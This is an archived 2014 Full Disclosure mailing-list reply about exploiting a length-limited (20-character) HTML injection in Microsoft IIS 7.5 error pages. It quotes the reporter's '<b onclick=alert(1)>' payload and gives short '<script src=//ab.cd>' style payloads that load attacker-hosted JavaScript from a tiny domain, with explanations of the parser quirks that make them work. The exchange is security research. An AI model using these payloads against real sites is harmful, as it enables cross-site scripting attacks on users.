[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <547A7E34.3020008@rtwaysea.net>
Date: Sat, 29 Nov 2014 18:17:24 -0800
From: waysea <waysea@...aysea.net>
To: fulldisclosure@...lists.org
Subject: Re: [FD] XSS (in 20 chars) in Microsoft IIS 7.5 error message
If you can get a <script> tag in (usually the very first tag to be
blacklisted), you could
1. register a two character domain with a two character TLD (all the
single character domains with two letter TLDs had been taken the last
time I checked)
2. have the root page be an index.js file (instead of index.html)
3. use something like:
A) <script src=//ab.cd>
or
B) <script/src=//ef.gh>
Without knowing more about your specific situation, either of the above
*_should_* work as HTML parsers are usually very lenient on what they
allow. So:
1. There doesn't usually need to be a close script </script> tag.
2. After declaring a src, any text that might be inline JavaScript is
ignored.
3. Immediately after the tag name declaration, the / character can be
used in place of a space (but not for any other attributes after that).
4. By starting off with // in the src definition, the parser will simply
use whatever protocol (http or https) the current page is on and
automagically insert it into the script request.
5. As you already know, the HTML parser doesn't need to have the
attribute value enclosed in ' or " characters, and will see the >
character as the end of the tag, not part of the attribute value.
Of course, if the DOCTYPE is XHTML instead of HTML, then some of the
above is no longer valid.
If you don't want to register a domain, the guy that owns http://xy.vg
has that setup already in place and is usually cool about people using
that in their proof of concepts as long as you send an email beforehand
stating what you're doing with it (see http://xy.vg/about/). It is http
only at the moment (no https yet), so if your error page is over https
then mixed content rules may come into play and prevent the script from
loading.
On 11/27/2014 10:35 AM, A Z wrote:
> Hello everyone,
>
>
> I found some weird HTML code injection in an IIS error message. IIS spits
> out some part of the user input that generated the error message, but will
> only display 20 characters at most.
> My question is: is it possible to actually exploit an XSS with this ?
>
> Here is an example:
>
> HTTP Request: mypage?search=%3cb%20onclick%3dalert(1)>%3e
> HTTP Response (real):
>
> <p>An error has occured.</p>
> <p>Exception HttpRequestValidationException occurred while attempting
> <b>mypage</b></p>
> <p>Exception message is: <b>A potentially dangerous Request.QueryString
> value was detected from the client (search="<b
> onclick=alert(1)>...").</b></p>
> <p>Stack trace:</p>
> <pre>
> Server stack trace:
> [..]
>
> My payload was: <b onclick=alert(1)>> and it works (after clicking).
> However, can this actually be exploited in real life ? I tried stuff in 20
> characters like: <embed src=http://x> or <img src=http://x/z> but no luck.
> Has anyone ever tried this before ?
>
> Thanks,
>
> P.S. This might be a silly question with an obvious answer. If so, I'd be
> grateful to have some extra information (links, docs etc.).
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists